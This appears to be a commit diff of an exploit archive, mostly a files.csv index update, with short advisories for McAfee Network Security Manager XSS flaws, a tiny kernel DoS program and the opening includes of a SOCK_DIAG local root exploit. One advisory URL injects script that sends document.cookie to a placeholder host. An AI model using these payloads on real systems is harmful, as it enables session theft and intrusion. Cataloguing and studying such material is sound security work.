Updated 05_15_2014
parent
3a841992e3
commit
7371706026
23 changed files with 1422 additions and 631 deletions
52
files.csv
52
files.csv
|
@ -3605,7 +3605,7 @@ id,file,description,date,author,platform,type,port
|
|||
3951,platforms/windows/remote/3951.html,"LeadTools Thumbnail Browser Control (lttmb14E.ocx) Remote BoF Exploit",2007-05-18,shinnai,windows,remote,0
|
||||
3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL) BoF Exploit",2007-05-18,shinnai,windows,remote,0
|
||||
3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities",2007-05-19,"Mehmet Ince",php,webapps,0
|
||||
3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69
|
||||
3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69
|
||||
3955,platforms/php/webapps/3955.py,"Zomplog <= 3.8 (mp3playlist.php speler) Remote SQL Injection Exploit",2007-05-20,NeoMorphS,php,webapps,0
|
||||
3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends <= 4.21 Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
|
||||
3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0
|
||||
|
@ -4945,9 +4945,9 @@ id,file,description,date,author,platform,type,port
|
|||
5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - Remote SQL Injection Vulnerability",2008-03-25,girex,php,webapps,0
|
||||
5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 (mod.php) Local File Inclusion Vulnerability",2008-03-25,girex,php,webapps,0
|
||||
5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities",2008-03-26,meathive,hardware,remote,0
|
||||
5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
|
||||
5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 - ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
|
||||
5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69
|
||||
5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD Remote DoS Exploit",2008-03-26,muts,windows,dos,0
|
||||
5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote DoS Exploit",2008-03-26,muts,windows,dos,0
|
||||
5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0
|
||||
5318,platforms/php/webapps/5318.txt,"Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability",2008-03-28,parad0x,php,webapps,0
|
||||
5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0
|
||||
|
@ -5081,7 +5081,7 @@ id,file,description,date,author,platform,type,port
|
|||
5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 poll Remote SQL Injection Vulnerability",2008-04-14,S@BUN,php,webapps,0
|
||||
5449,platforms/php/webapps/5449.php,"KwsPHP (Upload) Remote Code Execution Exploit",2008-04-14,Ajax,php,webapps,0
|
||||
5450,platforms/php/webapps/5450.txt,"Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability",2008-04-15,JosS,php,webapps,0
|
||||
5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080
|
||||
5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080
|
||||
5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database <= 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
|
||||
5453,platforms/windows/dos/5453.pl,"DivX Player <= 6.7.0 SRT File Buffer Overflow PoC",2008-04-15,securfrog,windows,dos,0
|
||||
5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 (new) Remote SQL Injection Vulnerability",2008-04-15,cO2,php,webapps,0
|
||||
|
@ -9075,7 +9075,7 @@ id,file,description,date,author,platform,type,port
|
|||
9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability",2009-09-09,DokFLeed,asp,webapps,0
|
||||
9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0
|
||||
9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0
|
||||
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
|
||||
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
|
||||
9618,platforms/windows/local/9618.php,"Millenium MP3 Studio (pls/mpf/m3u) Local Universal BOF Exploits (SEH)",2009-09-09,hack4love,windows,local,0
|
||||
9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BOF (SEH)",2009-09-09,hack4love,windows,local,0
|
||||
9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0
|
||||
|
@ -9131,7 +9131,7 @@ id,file,description,date,author,platform,type,port
|
|||
9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 (.XML File) Buffer Overflow PoC",2009-09-14,the_Edit0r,windows,dos,0
|
||||
9671,platforms/windows/dos/9671.py,"Tuniac v.090517c (.PLS File) Local Crash PoC",2009-09-14,zAx,windows,dos,0
|
||||
9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow PoC",2009-09-14,Dr_IDE,windows,dos,0
|
||||
9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) 0day",2009-09-15,blake,windows,remote,6660
|
||||
9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) 0day",2009-09-15,blake,windows,remote,6660
|
||||
9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Auth Bypass) SQL Injection Vulnerability",2009-09-15,snakespc,php,webapps,0
|
||||
9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln",2009-09-15,R3d-D3V!L,asp,webapps,0
|
||||
9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 /Scripts Access Restriction Bypass Vulnerability",2009-09-15,"Usman Saeed",windows,remote,0
|
||||
|
@ -9146,12 +9146,12 @@ id,file,description,date,author,platform,type,port
|
|||
9687,platforms/windows/local/9687.py,"SAP Player 0.9 (.pla) Universal Local Buffer Overflow Exploit (SEH)",2009-09-15,mr_me,windows,local,0
|
||||
9688,platforms/hardware/local/9688.txt,"NetAccess IP3 (ping option) Command Injection Vulnerability (auth)",2009-09-15,r00t,hardware,local,0
|
||||
9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 (m3u File) Local Crash PoC",2009-09-15,zAx,windows,dos,0
|
||||
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
|
||||
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
|
||||
9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 (.PLS file) Local Crash Exploit",2009-09-15,prodigy,windows,dos,0
|
||||
9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 (cat) Remote Blind SQL Injection Vulnerability",2009-09-15,InjEctOr5,php,webapps,0
|
||||
9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities",2009-09-15,"Chip d3 bi0s",php,webapps,0
|
||||
9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability",2009-09-16,Dr_IDE,windows,remote,0
|
||||
9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0
|
||||
9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0
|
||||
9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 (Auth Bypass) Remote SQL Injection Vulnerability",2009-09-16,snakespc,php,webapps,0
|
||||
9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection Vulnerability",2009-09-16,"Chip d3 bi0s",php,webapps,0
|
||||
9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss (id) Blind SQL Injection Exploit",2009-09-16,"Chip d3 bi0s",php,webapps,0
|
||||
|
@ -9189,7 +9189,7 @@ id,file,description,date,author,platform,type,port
|
|||
9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0
|
||||
9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
|
||||
9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
|
||||
9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0
|
||||
9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0
|
||||
9800,platforms/windows/remote/9800.cpp,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80
|
||||
9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0
|
||||
9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler exploit",2009-09-29,bruiser,windows,remote,0
|
||||
|
@ -9973,7 +9973,7 @@ id,file,description,date,author,platform,type,port
|
|||
10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario Blind SQL injection Vulnerability",2009-12-28,Mr.tro0oqy,php,webapps,0
|
||||
10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower SQL Injection Vulneralbility",2009-12-28,"Don Tukulesto",php,webapps,0
|
||||
10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0
|
||||
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
|
||||
10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0day)",2009-12-29,Lincoln,windows,remote,6660
|
||||
10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
|
||||
10770,platforms/asp/webapps/10770.txt,"PSnews DB Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
|
||||
10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection and Path Diclosure Download Vulnerability",2009-12-29,indoushka,asp,webapps,0
|
||||
|
@ -10111,7 +10111,7 @@ id,file,description,date,author,platform,type,port
|
|||
10968,platforms/php/webapps/10968.txt,"portal modulnet <= 1.0 - (id) SQL Injection Vulnerability",2010-01-03,Red-D3v1L,php,webapps,0
|
||||
10971,platforms/php/webapps/10971.txt,"Joomla Bamboo Simpla Admin Template SQL Injection Vulnerability",2010-01-03,R3d-D3V!L,php,webapps,0
|
||||
10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0
|
||||
10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit 2",2010-01-03,DouBle_Zer0,windows,remote,0
|
||||
10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit (2)",2010-01-03,DouBle_Zer0,windows,remote,0
|
||||
10974,platforms/php/webapps/10974.txt,"Simple Portal <= 2.0 - Auth Bypass",2010-01-03,Red-D3v1L,php,webapps,0
|
||||
10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop (productdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0
|
||||
10977,platforms/php/webapps/10977.txt,"Smart Vsion Script News (newsdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0
|
||||
|
@ -10846,7 +10846,7 @@ id,file,description,date,author,platform,type,port
|
|||
11875,platforms/php/webapps/11875.py,"Easy-Clanpage <= 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0
|
||||
11876,platforms/php/webapps/11876.txt,"justVisual 2.0 (index.php) <= LFI Vulnerability",2010-03-25,eidelweiss,php,webapps,0
|
||||
11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF",2010-03-25,sud0,windows,remote,21
|
||||
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 DoS",2010-03-25,_SuBz3r0_,windows,dos,69
|
||||
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - DoS",2010-03-25,_SuBz3r0_,windows,dos,69
|
||||
11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0
|
||||
11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printer Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0
|
||||
11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection exploit",2010-03-25,Sc0rpi0n,php,webapps,0
|
||||
|
@ -14130,7 +14130,7 @@ id,file,description,date,author,platform,type,port
|
|||
16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP Long Mode Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,metasploit,windows,remote,0
|
||||
16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21- Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0
|
||||
16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 Long Filename Overflow",2011-03-05,metasploit,windows,remote,0
|
||||
16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 - Long Filename Overflow",2011-03-05,metasploit,windows,remote,0
|
||||
16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",2010-06-15,metasploit,windows,remote,0
|
||||
16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0
|
||||
16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0
|
||||
|
@ -14206,7 +14206,7 @@ id,file,description,date,author,platform,type,port
|
|||
16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 Buffer Overflow",2010-11-30,metasploit,windows,remote,0
|
||||
16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy Buffer Overflow",2010-06-22,metasploit,windows,remote,0
|
||||
16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16427,platforms/windows/remote/16427.rb,"Windows RSH daemon Buffer Overflow",2010-04-30,metasploit,windows,remote,0
|
||||
16428,platforms/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16429,platforms/windows/remote/16429.rb,"HP OpenView Operations OVTrace Buffer Overflow",2010-06-22,metasploit,windows,remote,0
|
||||
|
@ -19700,7 +19700,7 @@ id,file,description,date,author,platform,type,port
|
|||
22463,platforms/php/webapps/22463.txt,"Wordpress Spider Catalog 1.1 HTML Code Injection and Cross-Site scripting",2012-11-04,D4NB4R,php,webapps,0
|
||||
22464,platforms/windows/dos/22464.txt,"Adobe Reader 11.0.0 Stack Overflow Crash PoC",2012-11-04,coolkaveh,windows,dos,0
|
||||
22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 Local Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0
|
||||
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
|
||||
22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0
|
||||
22467,platforms/windows/dos/22467.txt,"KMPlayer 3.3.0.33 - Multiple Vulnerabilities",2012-11-04,Mr.XHat,windows,dos,0
|
||||
22468,platforms/unix/remote/22468.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (1)",2003-04-11,Xpl017Elz,unix,remote,0
|
||||
22469,platforms/unix/remote/22469.c,"Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (2)",2003-04-07,c0wboy,unix,remote,0
|
||||
|
@ -21680,8 +21680,8 @@ id,file,description,date,author,platform,type,port
|
|||
24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability",2013-02-19,LiquidWorm,php,webapps,0
|
||||
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
|
||||
24526,platforms/windows/remote/24526.py,"MS Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
|
||||
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2 SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
|
||||
24528,platforms/windows/remote/24528.rb,"BigAnt Server DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
|
||||
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
|
||||
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
|
||||
24529,platforms/php/remote/24529.rb,"OpenEMR PHP File Upload Vulnerability",2013-02-20,metasploit,php,remote,0
|
||||
24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0
|
||||
24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
|
||||
|
@ -21887,7 +21887,7 @@ id,file,description,date,author,platform,type,port
|
|||
24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow Vulnerability",2013-03-13,coolkaveh,windows,dos,0
|
||||
24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 - 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0
|
||||
24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,metasploit,windows,remote,0
|
||||
24746,platforms/lin_x86-64/local/24746.c,"Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
|
||||
24746,platforms/lin_x86-64/local/24746.c,"Ubuntu 12.10 64-Bit sock_diag_handlers - Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
|
||||
24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
|
||||
24748,platforms/php/webapps/24748.txt,"event calendar Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0
|
||||
24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
|
||||
|
@ -30035,6 +30035,7 @@ id,file,description,date,author,platform,type,port
|
|||
33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 CVE-2009-3382 Remote Memory Corruption Vulnerability",2009-10-27,"Carsten Book",linux,dos,0
|
||||
33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
|
||||
33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0
|
||||
33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection",2014-05-12,"Chris Hebert",php,webapps,443
|
||||
33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 and NetBSD 5.0.1 'printf(1)' Format String Parsing Denial of Service Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
|
||||
33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
|
||||
33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0
|
||||
|
@ -30049,3 +30050,18 @@ id,file,description,date,author,platform,type,port
|
|||
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
|
||||
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
|
||||
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
|
||||
33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
|
||||
33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0
|
||||
33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0
|
||||
33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0
|
||||
33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 index.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 search.php from_date_day Parameter Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 search.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 register.php result Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 index.php New User Creation CSRF",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0
|
||||
33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 Multiple Cross Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0
|
||||
33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 Information Disclosure Vulnerability",2009-11-06,"Daniel King",jsp,webapps,0
|
||||
33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0
|
||||
33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service Vulnerability",2009-11-12,HACKATTACK,windows,dos,0
|
||||
33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 '/dhost/modules?I:' Buffer Overflow Vulnerability",2009-11-12,HACKATTACK,novell,remote,0
|
||||
|
|
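Review bot: The added index row `33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0` (hunk @ -30049) omits the CVE identifier that the file's own header names (CVE-2013-1763), even though this index already carries CVE ids in descriptions (see the 33314 row in the @ -30035 hunk); suggested row: `33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit (CVE-2013-1763)",2013-02-24,SynQ,linux,local,0`. The same row indexes a C source file under a `.txt` name, so any tooling that classifies entries by extension will mis-file it; if that is a deliberate archive convention it should be stated somewhere the index's consumers can see it. The new 33336 row also appears to cover the same kernel bug as the existing 24746 row (`sock_diag_handlers`) — inferred from the names only — so a cross-reference in the description would make correlation between the two entries easier.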
|
12
platforms/jsp/webapps/33346.txt
Executable file
12
platforms/jsp/webapps/33346.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/37003/info
|
||||
|
||||
McAfee Network Security Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
These issues affect McAfee Network Security Manager 5.1.7.7; other versions may also be affected.
|
||||
|
||||
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57
|
||||
|
||||
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(â??XSSâ??)</script>8b3283a1e57
|
||||
|
11
platforms/jsp/webapps/33347.txt
Executable file
11
platforms/jsp/webapps/33347.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/37004/info
|
||||
|
||||
McAfee Network Security Manager is prone to an information-disclosure vulnerability because it fails to properly protect sensitive cookie data with the 'HTTPOnly' protection mechanism.
|
||||
|
||||
A successful exploit may allow attackers to steal cookie-based authentication credentials; information harvested may aid in further attacks.
|
||||
|
||||
This issue affects McAfee Network Security Manager 5.1.7.7; other versions may also be affected.
|
||||
|
||||
|
||||
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1
|
||||
4%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57
|
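--- a/platforms/linux/dos/33338.c
+++ b/platforms/linux/dos/33338.c
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/36953/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability that stems from a NULL-pointer dereference.
+
+Attackers can exploit this issue to crash the affected computer, denying service to legitimate users.
+
+int main()
+{
+static long long a[1024 * 1024 * 20] = { 0 };
+
+return a;
+
+}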
164
platforms/linux/local/33336.txt
Executable file
164
platforms/linux/local/33336.txt
Executable file
|
@ -0,0 +1,164 @@
|
|||
/*
|
||||
* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
|
||||
* bug found by Spender
|
||||
* poc by SynQ
|
||||
*
|
||||
* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
|
||||
* using nl_table->hash.rehash_time, index 81
|
||||
*
|
||||
* Fedora 18 support added
|
||||
*
|
||||
* 2/2013
|
||||
*/
|
||||
|
||||
#include <unistd.h>
|
||||
#include <sys/socket.h>
|
||||
#include <linux/netlink.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <errno.h>
|
||||
#include <linux/if.h>
